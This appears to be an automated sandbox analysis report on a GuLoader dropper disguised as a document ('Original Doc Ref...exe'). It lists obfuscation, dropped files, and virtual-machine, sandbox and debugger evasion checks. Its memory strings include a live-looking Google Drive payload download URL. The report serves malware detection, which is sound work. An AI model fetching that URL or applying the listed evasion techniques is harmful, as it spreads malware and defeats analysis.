Source: Original Doc Ref SN02853801324189923.exe Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Original Doc Ref SN02853801324189923.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wextract.pdb source: Original Doc Ref SN02853801324189923.exe
Source: Binary string: wntdll.pdbUGP source: Semiha.exe, 00000019.00000002.782575822.000000001E7A0000.00000040.00000001.sdmp, Semiha.exe, 00000019.00000002.782754601.000000001E8BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Semiha.exe, Semiha.exe, 00000019.00000002.782575822.000000001E7A0000.00000040.00000001.sdmp, Semiha.exe, 00000019.00000002.782754601.000000001E8BF000.00000040.00000001.sdmp
Source: Binary string: wextract.pdbPp source: Original Doc Ref SN02853801324189923.exe

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000019.00000000.481436441.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.482011607.00000000029E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.779078252.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC78A1 push ecx; ret 0_2_00FC78B4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_00404C39 pushfd ; ret 2_2_00404C3C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_00406D5F push ebp; iretd 2_2_00406D60
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_00406B0D push ss; ret 2_2_00406B26
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029E4E50 push B1CC20AFh; ret 2_2_029E4E55
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029E5276 push esp; ret 2_2_029E5277
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029E4316 push ds; iretd 2_2_029E4318
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029E1328 push esp; ret 2_2_029E132F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029E1321 push eax; iretd 2_2_029E1327
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029E0005 push cs; retf 2_2_029E000E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029E0078 push cs; retf 2_2_029E007F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029E3DDD push ss; retf 2_2_029E3E8F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029E3DD5 push ss; retf 2_2_029E3E8F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029E5560 push esp; iretd 2_2_029E556E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E81D0D1 push ecx; ret 25_2_1E81D0E4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_00560078 push cs; retf 25_2_0056007F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_00560005 push cs; retf 25_2_0056000E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_00565560 push esp; iretd 25_2_0056556E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_00563DD5 push ss; retf 25_2_00563E8F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_00563DDD push ss; retf 25_2_00563E8F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_00564E50 push B1CC20AFh; ret 25_2_00564E55
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_00565276 push esp; ret 25_2_00565277
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_00564316 push ds; iretd 25_2_00564318
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_00561321 push eax; iretd 25_2_00561327
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_00561328 push esp; ret 25_2_0056132F
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC2DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA, 0_2_00FC2DAE
Source: initial sample Static PE information: section name: .text entropy: 7.1128813164

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Jump to dropped file
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC1910 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA, 0_2_00FC1910
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Semiha.exe, 00000019.00000002.779387050.00000000021D0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1VQWZ_R4BQMLYR0EWMVVJ53NSYRGJMPKL
Source: Semiha.exe, 00000002.00000002.482151039.0000000002B20000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779387050.00000000021D0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Semiha.exe, 00000002.00000002.482151039.0000000002B20000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7F6A60 rdtscp 25_2_1E7F6A60
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC532F GetSystemInfo,CreateDirectoryA,RemoveDirectoryA, 0_2_00FC532F
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC21E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00FC21E7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File opened: C:\Users\user~1\ Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File opened: C:\Users\user~1\AppData\Local\Temp\ Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\ Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File opened: C:\Users\user~1\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File opened: C:\Users\user~1\AppData\ Jump to behavior
Source: explorer.exe, 0000001C.00000002.771094420.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000001C.00000002.771094420.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Semiha.exe, 00000019.00000003.742387045.000000000091D000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779208842.000000000091D000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW-
Source: explorer.exe, 0000001C.00000002.771382701.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Semiha.exe, 00000019.00000003.742387045.000000000091D000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779208842.000000000091D000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001C.00000000.752050950.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Semiha.exe, 00000002.00000002.482151039.0000000002B20000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779387050.00000000021D0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: Semiha.exe, 00000002.00000002.482151039.0000000002B20000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: explorer.exe, 0000001C.00000002.771382701.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: explorer.exe, 0000001C.00000002.766113713.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: explorer.exe, 0000001C.00000000.752050950.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 0000001C.00000002.771382701.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: Semiha.exe, 00000019.00000002.779387050.00000000021D0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKl
Source: explorer.exe, 0000001C.00000002.768967562.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC2DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA, 0_2_00FC2DAE
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7F6A60 rdtscp 25_2_1E7F6A60
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029EBA69 mov eax, dword ptr fs:[00000030h] 2_2_029EBA69
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029EC093 mov eax, dword ptr fs:[00000030h] 2_2_029EC093
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029E9CA7 mov eax, dword ptr fs:[00000030h] 2_2_029E9CA7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E85FE87 mov eax, dword ptr fs:[00000030h] 25_2_1E85FE87
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D766D mov eax, dword ptr fs:[00000030h] 25_2_1E7D766D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E8446A7 mov eax, dword ptr fs:[00000030h] 25_2_1E8446A7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E890EA5 mov eax, dword ptr fs:[00000030h] 25_2_1E890EA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E890EA5 mov eax, dword ptr fs:[00000030h] 25_2_1E890EA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E890EA5 mov eax, dword ptr fs:[00000030h] 25_2_1E890EA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C9240 mov eax, dword ptr fs:[00000030h] 25_2_1E7C9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C9240 mov eax, dword ptr fs:[00000030h] 25_2_1E7C9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C9240 mov eax, dword ptr fs:[00000030h] 25_2_1E7C9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C9240 mov eax, dword ptr fs:[00000030h] 25_2_1E7C9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E87FEC0 mov eax, dword ptr fs:[00000030h] 25_2_1E87FEC0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CE620 mov eax, dword ptr fs:[00000030h] 25_2_1E7CE620
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E898ED6 mov eax, dword ptr fs:[00000030h] 25_2_1E898ED6
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CC600 mov eax, dword ptr fs:[00000030h] 25_2_1E7CC600
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CC600 mov eax, dword ptr fs:[00000030h] 25_2_1E7CC600
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CC600 mov eax, dword ptr fs:[00000030h] 25_2_1E7CC600
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7F16E0 mov ecx, dword ptr fs:[00000030h] 25_2_1E7F16E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D76E2 mov eax, dword ptr fs:[00000030h] 25_2_1E7D76E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7F36CC mov eax, dword ptr fs:[00000030h] 25_2_1E7F36CC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E87FE3F mov eax, dword ptr fs:[00000030h] 25_2_1E87FE3F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C52A5 mov eax, dword ptr fs:[00000030h] 25_2_1E7C52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C52A5 mov eax, dword ptr fs:[00000030h] 25_2_1E7C52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C52A5 mov eax, dword ptr fs:[00000030h] 25_2_1E7C52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C52A5 mov eax, dword ptr fs:[00000030h] 25_2_1E7C52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C52A5 mov eax, dword ptr fs:[00000030h] 25_2_1E7C52A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E87B260 mov eax, dword ptr fs:[00000030h] 25_2_1E87B260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E87B260 mov eax, dword ptr fs:[00000030h] 25_2_1E87B260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7FD294 mov eax, dword ptr fs:[00000030h] 25_2_1E7FD294
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7FD294 mov eax, dword ptr fs:[00000030h] 25_2_1E7FD294
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E80927A mov eax, dword ptr fs:[00000030h] 25_2_1E80927A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E88138A mov eax, dword ptr fs:[00000030h] 25_2_1E88138A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CDB60 mov ecx, dword ptr fs:[00000030h] 25_2_1E7CDB60
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CF358 mov eax, dword ptr fs:[00000030h] 25_2_1E7CF358
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E895BA5 mov eax, dword ptr fs:[00000030h] 25_2_1E895BA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CDB40 mov eax, dword ptr fs:[00000030h] 25_2_1E7CDB40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7DEF40 mov eax, dword ptr fs:[00000030h] 25_2_1E7DEF40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7FE730 mov eax, dword ptr fs:[00000030h] 25_2_1E7FE730
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C4F2E mov eax, dword ptr fs:[00000030h] 25_2_1E7C4F2E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C4F2E mov eax, dword ptr fs:[00000030h] 25_2_1E7C4F2E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E89070D mov eax, dword ptr fs:[00000030h] 25_2_1E89070D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E89070D mov eax, dword ptr fs:[00000030h] 25_2_1E89070D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E88131B mov eax, dword ptr fs:[00000030h] 25_2_1E88131B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E85FF10 mov eax, dword ptr fs:[00000030h] 25_2_1E85FF10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E85FF10 mov eax, dword ptr fs:[00000030h] 25_2_1E85FF10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E898B58 mov eax, dword ptr fs:[00000030h] 25_2_1E898B58
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E898F6A mov eax, dword ptr fs:[00000030h] 25_2_1E898F6A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D1B8F mov eax, dword ptr fs:[00000030h] 25_2_1E7D1B8F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7D1B8F mov eax, dword ptr fs:[00000030h] 25_2_1E7D1B8F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E843884 mov eax, dword ptr fs:[00000030h] 25_2_1E843884
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E843884 mov eax, dword ptr fs:[00000030h] 25_2_1E843884
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7E746D mov eax, dword ptr fs:[00000030h] 25_2_1E7E746D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E8090AF mov eax, dword ptr fs:[00000030h] 25_2_1E8090AF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7FBC2C mov eax, dword ptr fs:[00000030h] 25_2_1E7FBC2C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E85B8D0 mov eax, dword ptr fs:[00000030h] 25_2_1E85B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E85B8D0 mov ecx, dword ptr fs:[00000030h] 25_2_1E85B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E85B8D0 mov eax, dword ptr fs:[00000030h] 25_2_1E85B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E85B8D0 mov eax, dword ptr fs:[00000030h] 25_2_1E85B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E85B8D0 mov eax, dword ptr fs:[00000030h] 25_2_1E85B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E85B8D0 mov eax, dword ptr fs:[00000030h] 25_2_1E85B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7DB02A mov eax, dword ptr fs:[00000030h] 25_2_1E7DB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7DB02A mov eax, dword ptr fs:[00000030h] 25_2_1E7DB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7DB02A mov eax, dword ptr fs:[00000030h] 25_2_1E7DB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7DB02A mov eax, dword ptr fs:[00000030h] 25_2_1E7DB02A
